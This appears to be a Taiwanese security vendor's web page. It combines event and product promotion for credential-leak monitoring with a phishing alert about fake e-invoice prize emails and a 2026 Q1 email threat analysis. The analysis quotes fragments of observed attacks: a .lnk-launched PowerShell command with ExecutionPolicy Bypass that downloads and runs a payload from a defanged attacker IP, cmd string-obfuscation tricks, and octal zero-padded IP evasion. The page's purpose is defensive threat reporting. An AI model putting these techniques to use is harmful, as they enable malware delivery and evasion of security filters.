資安攻防是一連串反應與速度的考驗，在攻擊手法不斷進化的環境中，能否在安全事態擴大前掌握關鍵時差進行即時阻斷，已成為企業防禦成敗的關鍵。

為了協助企業應對日益嚴峻的資安挑戰，Softnext 中華數位科技將於 2026 年 4 月在台北、新竹、台中、高雄等地，舉辦「在威脅擴大前，掌握資安防禦關鍵時差」研討活動。

三大焦點議題：

• 縮短漏洞修補時差：從實務情境出發，探討如何建立可控、可驗證的自動化修補流程，在駭客利用漏洞前先行阻斷風險。
• AD 深度檢測與異動追蹤：透過 Netwrix 自動化維運調好 AD 體質，將 IT 人員從重複、易出錯的稽核瑣事中解脫，精準追蹤異動並優化管理。
• 【新品登場】暗網外洩憑證情資：許多憑證外洩後並非立即被利用，而是先在暗網販售；透過 Hudson Rock Cavalier的即時監控，讓企業能趕在駭客發動攻擊的「時差」內先行因應，阻斷初始入侵路徑。
  

中華數位科技長期關注全球資安威脅發展趨勢，深知企業的資安需求不僅止於郵件安全。透過持續觀察並深入了解台灣企業實務上的資安需求，中華數位科技陸續引進多款國際資安大廠的防護產品，將防護範圍從郵件安全延伸至更全面的網路安全領域。

除了具備自主研發能力外，中華數位科技同時也是技術深厚的資安代理商。憑藉扎實的研發背景與長期累積的技術經驗，在協助企業面對資安問題時，能更快速判斷問題類型並提供在地技術支援，降低將問題轉交國外原廠處理所需的時間成本。同時，中華數位科技亦能針對企業在地應用情境進行加值開發，使國際資安產品更貼近台灣企業的實際使用需求，協助企業打造更完整的資安防護體系。

本次活動聚焦企業資安防護的三大關鍵面向：漏洞修補、AD 身份稽核，以及暗網外洩憑證情資監控。透過實務案例與國際資安技術分享，協助企業縮短威脅反應時差，在攻擊發生前提前偵測與阻斷潛在風險。

活動內容及報名資訊，請參考Softnext 中華數位「2026 在威脅擴大前，掌握資安防禦關鍵時差」活動網頁

隨著 Infostealer 資訊竊取惡意軟體成為多數重大資安事件的關鍵起點，企業的憑證外洩風險正逐漸升高。中華數位科技日前正式成為以色列資安情資公司Hudson Rock在台灣的代理商，將Hudson Rock領先全球的 Infostealer 威脅情資平台代理引進台灣市場，協助企業在攻擊發生前，即時識別帳密外洩、端點感染與供應鏈資安風險。

根據 Hudson Rock 與多家威脅情報機構的研究，超過 70% 的勒索攻擊事件 是從憑證外洩或帳號入侵開始。即使企業已啟用多因素驗證（MFA），攻擊者可透過竊取的使用者帳號、密碼、瀏覽器憑證、Session Cookie 與 Token進行帳號接管、部署勒索軟體或竊取機敏資料，使企業防禦難度大幅提升。

Hudson Rock 是一家專精於 Infostealer Intelligence 的國際資安情資公司。長期追蹤全球實際遭 Infostealer 惡意竊資軟體感染的終端設備，擁有全球規模最大的 Infostealer 資料庫，涵蓋超過 2.5 億組被竊帳號與密碼、IP、裝置與地理位置資訊，累積來自數千萬台受害裝置的第一手威脅資料。可幫助企業了解下列風險：

•         檢測公司網域是否出現在感染資料中

•         辨識員工、合作夥伴或供應鏈是否存在憑證外洩風險

•         透過攻擊者視角，模擬駭客如何鎖定企業進行滲透

Hudson Rock 與一般威脅情資平台不同之處在於，直接從威脅行為者獲取情資。威脅行為者可分為兩類：

l   第一類 執行資訊竊取攻擊者：傳播惡意竊資軟體(Spread Infostealer malware)，盡可能感染更多電腦。攻擊活動結束，會將竊取的訊息出售給其他攻擊者。

l   第二類 攻擊執行者：購買竊取的資料，進行分析，並基於資訊竊取者 (Infostealer-originated) 提供的資訊發動實際的網路攻擊。

Hudson Rock 團隊深入威脅行為者的活動鏈，直接從第一類威脅行為者取得最新資料，為企業爭取到關鍵救援時間。

 Hudson Rock 的 Cavalier 企業外洩憑證監控和通知平台，可提供即時的帳密外洩警示，讓企業在駭客入侵前，就知道哪些帳號、IP 或端點曾被感染，並採取補救措施。

Hudson Rock 資料獲取技術流程

Hudson Rock Cavalier畫面示意

 了解 Hudson Rock如何協助掌握企業憑證的真實曝險風險，請參考網頁資訊( https://www.softnext.com.tw/products/hudsonrock.html )，或與中華數位科技聯繫 02-25422526。

Hudson Rock 是專注於 「Infostealer Intelligence資訊竊取惡意軟體情資」與「企業憑證洩漏分析」的網路威脅情資公司，幫助企業和安全團隊領先於不斷演變的威脅。憑藉其不斷擴展的受感染電腦網路犯罪情資的資料庫，Hudson Rock 提供可操作的情資和警報，協助企業保護員工、客戶和基礎設施免受網路犯罪分子的侵害。企業無論需要防範帳戶盜用、勒索軟體或資料洩露，Hudson Rock 的Cavalier企業外洩憑證監控和通知平台都能提供企業所需的工具，保障公司的營運安全。

中華數位科技致力於郵件安全技術研發與開發，長期關注資安威脅發展趨勢，深知企業的資安需求不僅止於郵件安全。透過持續觀察並深入了解台灣企業實務上的資安需求，中華數位科技陸續引進多款國際資安大廠的防護產品，將防護範圍從郵件安全延伸至更全面的網路安全領域。

除了具備自主研發能力，中華數位科技同時也是技術深厚的資安代理商。憑藉扎實的研發背景與長期累積的技術經驗，在協助企業面對資安問題時，能更快速判斷問題類型並提供在地技術支援，降低將問題轉交國外原廠處理所需的時間成本。同時，中華數位科技亦能針對企業在地應用情境進行加值開發，使國際資安產品更貼近台灣企業的實際使用需求，協助企業打造更完整的資安防護體系。

四月的連續假期剛結束，當大眾正處於重返工作崗位的適應期時，往往是防備心較弱的時刻。詐騙集團利用此心理弱點，結合「發票中獎」等帶有利益誘惑的社交工程（Social Engineering）手法，發動大規模的網路釣魚（Phishing）攻擊。

近期，中華數位科技與 ASRC 研究中心發現主旨為「雲端發票中獎通知」的電子郵件大量爆發。先別急著高興，冷靜檢視訊息內容，就能透過以下四個明顯的「威脅特徵」來識破這場騙局：

破綻一：寄件者網域與宣稱單位不符

收到中獎通知時，首要步驟是展開「寄件者」的詳細資訊，檢視真實的電子郵件地址。攻擊者通常會將顯示名稱竄改為「財政部電子發票整合服務平台」，但背後的實際發信地址卻是無關的信箱，或遭到駭客入侵的跳板網域。政府機關的正式公務信件，網域必定具備官方的一致性(例如：gov.tw結尾)。

破綻二：異常的發信主機與關聯網域活動

若進一步檢視電子郵件的原始資訊（如郵件標頭 Header）或網路連線紀錄，會發現這類釣魚信件的發送來源與關聯網域極度異常。例如，在此次攻擊活動中，發現了 tikoet.com（偽造國外知名旅遊平台的錯字網域）以及 info-yuyan.com 等不明網域的蹤跡。這些網域通常被駭客用作發信跳板或惡意流量重導向（Redirector）的中繼站。一封台灣財政部的通知信，其底層傳輸卻關聯這些境外或免洗網域，是不合邏輯且極具風險的。

破綻三：利用短網址技術進行防護規避

為了繞過企業的電子郵件安全閘道與掩飾真實的惡意連結，攻擊者會在信件中使用如 TinyURL 等縮址服務。這是一種常見的網址混淆技術（Obfuscation）。政府機關發送重要通知時，基於資訊透明與安全性考量，原則上會直接提供完整的官方網址，極少要求民眾點擊來源不明的短網址。

破綻四：錯字網域（Typosquatting）與偽造政府層級

若使用者不慎點擊了短網址，流量在經過中繼站後，最終會被導向類似下方的惡意網址： hxxps://gov.einvioce.com.tw/menghuan.html?c=aHR0cHM6Ly9nb3YuZWludmlvY2UuY29tLnR3Lw==

在我們進行調查的時間點，這個網頁已經關閉，但網址本身暗藏了兩個高階的欺騙手法：

1. 偽造政府網域層級： 台灣政府單位的官方網站，其頂級網域（TLD）必定是 .gov.tw。該釣魚網址的結尾是 .com.tw（一般商業註冊），攻擊者只是刻意在最前面加上了 gov. 作為「子網域（Subdomain）」，企圖混淆視聽。
2. 錯字網域攻擊： 財政部電子發票的正確英文拼寫為 einvoice。駭客刻意將網址註冊為 einvioce（將 o 和 i 順序對調），利用人類大腦在快速閱讀時會自動腦補修正的視覺錯覺，成功騙過受害者的眼睛。

資安防護建議與應對措施

當您被引導至該釣魚網站後，攻擊者會可能要求您輸入身分證字號、平台密碼，甚至以「匯入獎金」為由，誘騙您填寫信用卡卡號與背面末三碼（CVV），進而造成嚴重的財務損失與個資外洩。

為保障您的資訊與財產安全，請落實以下防護原則：

• 零信任原則（Zero Trust）： 「永不信任，始終驗證」（Never Trust, Always Verify），對於任何帶有超連結的主動通知（無論是簡訊或 Email）保持高度懷疑。絕對不要直接在點擊不明連結後開啟的網頁中，輸入任何機敏個資或金融資訊。
• 自主查證： 若需確認發票是否中獎，請略過信件中的連結，自行開啟官方推出的「統一發票兌獎 APP」，或於瀏覽器手動搜尋並進入「財政部電子發票整合服務平台」查證。
• 落實通報機制： 若收到此類帶有惡意網址的詐騙訊息，建議可撥打 165 反詐騙諮詢專線，或透過警政相關管道進行檢舉通報，協助將該惡意網域列入阻擋清單，降低整體網路環境的資安風險。

根據ASRC 垃圾訊息研究中心的觀察，2026年第一季，電子郵件安全威脅正經歷顯著的戰術轉變。從本季的防護統計數據中可以看出，儘管傳統的垃圾郵件與病毒信件依然佔據極大宗的網路流量，但純粹夾帶病毒執行檔的攻擊比例逐漸下降，取而代之的是帶有惡意連結的釣魚信件、以及高度客製化的社交工程攻擊大幅增加。

攻擊者正在積極轉向「離地攻擊」（Living off the Land）與「合法服務寄生」的策略。他們不再直接把惡意酬載塞進附檔，而是利用合法雲端服務（如微軟基礎設施）、各式混淆腳本與捷徑檔（.lnk）來作為攻擊鏈的開端。這些改變讓傳統基於靜態特徵碼（Signature-based）的防護機制面臨極大挑戰，企業的防禦重點必須從單一檔案掃描，延伸至行為模式、網址跳轉與身分授權的動態監控。

2026 Q1 關鍵攻擊樣本與手法剖析

1. 利用合法微軟 OAuth 服務進行「同意授權」釣魚與沙箱規避

攻擊手法：利用微軟官方網址與憑證授權機制

在本季截獲的樣本中，攻擊者透過發送看似正常的郵件，內含指向微軟官方登入網域的合法連結：

https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=...

攻擊者透過發送看似正常的郵件，內含指向微軟官方登入網域的合法連結

由於該網域本身具有極高的信譽評等，傳統郵件閘道通常會直接放行。

技術剖析：

• 非法同意攻擊（Illicit Consent Grant Attack）：連結內帶有 scope=openid+profile+https://graph.microsoft.com/User.Read 參數。攻擊者的目的是誘騙受害者登入後，授權一個惡意的第三方應用程式（App）存取其 Microsoft 365 帳戶資料，可能為了獲取身分資訊進行下一步的精準社交工程。
• 動態跳轉鏈（Open Redirect）：授權或跳轉過程中，流量會導向被駭客控制的網域（由開始fanaraco.com、hcart.org，最後落地於 ahmedcorecutting.com）。
• 沙箱規避機制（Evasion）：這是一個極具針對性的設計。攻擊者將受害者的 Email 進行 Base64 編碼，並透過 state 參數（如 state=Y2hlsmcuJ2FsdmluQGludmKudVjLmNvbQ===）進行傳遞。當發生第二次跳轉時，惡意伺服器會檢查此參數是否存在；如果不存在（這通常代表是資安廠商的自動化沙箱正在爬梳網頁），伺服器就會將流量導向無害的微軟 Office 維基百科頁面，藉此騙過安全檢測設備。

2. 壓縮檔夾帶惡意捷徑（.LNK）的無文件攻擊

攻擊手法：以捷徑檔取代 Office 巨集，執行本機指令

隨著微軟預設全面封鎖來自網路的 Office 巨集，攻擊者紛紛改用 .lnk（捷徑檔）作為惡意酬載的載體。本季樣本顯示，攻擊者會寄送名為 Document.zip 的壓縮檔，內部夾帶偽裝成文件的 Document.doc.lnk，利用使用者雙擊解壓縮檔案的習慣觸發攻擊。

攻擊者會寄送名為 Document.zip 的壓縮檔，內部夾帶偽裝成文件的 Document.doc.lnk，利用使用者雙擊解壓縮檔案的習慣觸發攻擊

技術剖析：

• 繞過執行原則：
  此捷徑檔直接呼叫 %windir%裡位於System32下的cmd.exe，以參數/c執行powershell.exe。並以ExecutionPolicy Bypass，強制繞過 Windows 預設阻擋未簽署腳本的安全原則。隨後利用 (New-Object System.Net.WebClient).DownloadFile由這個位置hxxp://178.16.54.109/spl.exe','%userprofile%\windrv.exe下載檔案後，將其另存為系統目錄下的 windrv.exe 並逕行啟動，完成系統感染。
• 變數替換與隱蔽視窗：
  這類透過lnk檔進行攻擊的樣本還有許多其他變體，有許多手法的利用都是可用來適應或隱蔽系統內建的執行方式：例如：呼叫conhost.exe並輔以--headless來確保呼叫cmd.exe執行時不會跳出黑色的命令提示字元視窗。在指令列中，為避免惡意指令被偵測出來，故意將cmd寫為`cm""d`，而Windows指令中，字串內的雙引號會被忽略，所以 `cm""d` 實際上就是 `cmd`，可以被執行。並且同時，指令中以/V:ON開啟「延遲環境變數擴充」（Delayed Environment Variable Expansion），讓Windows 允許使用驚嘆號 `!變數名稱!` 來讀取變數，並在程式執行的「當下」才去解析並替換它的值。接下來，字串變數替換技術set yw=t&& powershell func!yw!ion ge!yw!i!yw!...，還原後即為 function getit...）來混淆 PowerShell 指令。它會在背景偷偷下載惡意腳本 tp.js 執行，同時下載一份正常的 sample.pdf 並開啟，以此轉移使用者的注意力。

指令中使用了字串變數替換技術

3. 惡意文件內的零填充 IP 網址混淆技術

攻擊手法：利用底層網路解析特性繞過字串過濾

這是一起夾帶於偽造採購單文件（PO #4300019386.docx）內的精巧攻擊。攻擊者並未在文件中直接寫入一般的 URL 或 IP，而是採用了不常見的八進位與零填充（Zero-Padded）技術。

技術剖析：

• 攻擊者將惡意伺服器的 IP 轉換為八進位格式，並在前方加上大量的「0」：00000000000000000000000000000000000000030000730347
• 網址路徑同樣填滿了零：/00000000000000000000000003.php
• 底層邏輯：許多郵件閘道或資安設備是依靠「正規表示式（Regex）」來尋找 http://192.168.x.x 格式的網址。這串看似亂碼的數字能完美繞過字串比對！但當使用者點擊時，Windows 內建的網路 API（如 WinINet）與主流瀏覽器會偵測到數字前方的 0，並將其識別為八進位表示法的起始標記。儘管中間填充了大量冗餘的零，底層解析器仍能正確將這串八進位數值還原為駭客的真實 IP 位址進行連線，順利下載惡意檔案。

攻擊者將惡意伺服器的 IP 轉換為八進位格式

總結與防禦建議

關鍵態勢與攻擊者意圖

本季的威脅事件明確指出，攻擊者的首要目標是「繞過邊界防護」與「竊取雲端存取權限」：他們將攻擊鏈拆解得更為破碎，利用微軟官方的登入機制來建立信任感（騙過人也騙過機器）；使用罕見的 URL 特殊表示手法（零填充 IP）可用以躲避靜態偵測；或利用 .lnk 捷徑檔結合 PowerShell 來進行無文件攻擊（Fileless Attack），顯示駭客正積極避免在留下任何傳統可被偵測的惡意執行檔特徵。

未來趨勢

1. SaaS 服務利用加劇：利用 Google、Microsoft、AWS 等高信譽網域進行釣魚跳轉或惡意程式代管將成為常態。
2. 非傳統辦公文件格式崛起：除了 .lnk，未來如 ISO、IMG 甚至 OneNote 檔案（.one）夾帶惡意程式的手法將持續增加。
3. 針對資安設備的「反偵測」技術：各種編碼、混淆手段的利用下，未來將有更多郵件只在「真實使用者環境」中才會展露惡意行為。

防護建議

企業提供的雲端服務，須留意或關閉一般使用者自行授權第三方應用程式存取企業資料的權限，建議改為集中審核制，防範 OAuth 釣魚。對於外部連結，應啟用「點擊時重寫與動態防護」（Time-of-Click Protection），確保在用戶點擊當下進行二次驗證。